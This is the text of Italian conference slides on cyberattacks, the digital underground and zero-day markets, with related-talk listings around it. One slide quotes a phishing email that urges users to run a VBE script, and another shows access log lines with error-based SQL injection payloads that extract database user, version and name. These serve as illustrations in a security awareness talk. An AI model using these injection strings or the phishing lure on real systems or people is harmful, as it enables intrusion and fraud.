Superhelt 2013-screen
 

Más de Codemotion

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserCodemotion
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Codemotion
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Codemotion
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Codemotion
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Codemotion
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Más de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Último

The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 

Último (20)

The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 

Attacchi, bugie e underground digitale by Andrea Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com ATTACCHI, BUGIE E UNDERGROUND DIGITALE Speaker: Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
  • 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com « » > Bonifica e Hardening fatta a tappeto un anno prima > Sistemi Operativi Patched all’ultima versione disponibile > Logging integrale di tutte le attività del Sito > 2 Sistemi IPS (Intrusion Prevention System) in cascata
  • 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Outside 70% Inside - Accidental 12% Inside - Malicious 9% Inside 5% Unknown 4% Source: http://datalossdb.org/ Statistiche 2012
  • 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 7,20% 6,20% 6,10% 5,70% 6,80% 6,80% 29,90% 41,20% 27,20% 34,10% 34,10% 30,70% 62,90% 52,60% 66,70% 60,20% 59,10% 62,50% Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 76,00% 3,80% 16,80% 3,40% 76,00% 6,50% 13,70% 3,80% 76,40% 6,70% 13,70% 3,20% Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com «Non è obiettivo di questo “focus” riportare in dettaglio i risultati della rilevazione ma analizzando i dati relativi ai valori medi per l’intero campione si può ritenere che i risultati siano: • soddisfacenti per la protezione logica; • molto soddisfacenti per la sicurezza dell’infrastruttura; • sufficienti per la sicurezza dei servizi; • da migliorare per la sicurezza dell’organizzazione. «Possiamo dire che ce l’aspettavamo»
  • 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Aki Mon Telecom Shane Atkinson Canter & Siegel Eddie Davidson Peter Francis-Macrae Davis Wolfgang Hawke Jumpstart Technologies Vandar Kushnir Kevin Lipnitz Wayne Mansfield Oleg Nikolaenko Alan Ralsky Dave Rhodes Scott Richter Russian Business Network iFrame Cash SBT Telecom Network Defcon Host Micronnet Ltd. InstallsCash Sendar Argic Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011 RBNet
  • 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  • 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com (*) According to Frank Rieger Chief technology officer at GSMK
  • 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
  • 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
  • 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html) Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser- sandbox-first-to-fall/10588)
  • 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Blackole Exploit Kit Cool Exploit Kit
  • 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Da: hdesk@rcs.it Inviato: Thursday, November 04, 2004 7:48 PM A: xxxxxx@rcs.it Oggetto: Aggiornamento configurazione Salve, riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di aggiornare collegandosi al seguente indirizzo: http://xxxx.rcs.it/software/av/index.html La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo dell'aggiornamento. Distinti Saluti Help Desk - Supporto Tecnico RCS RCS Editori S.p.A. - Settore Quotidiani
  • 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]= 1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a, substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64), floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
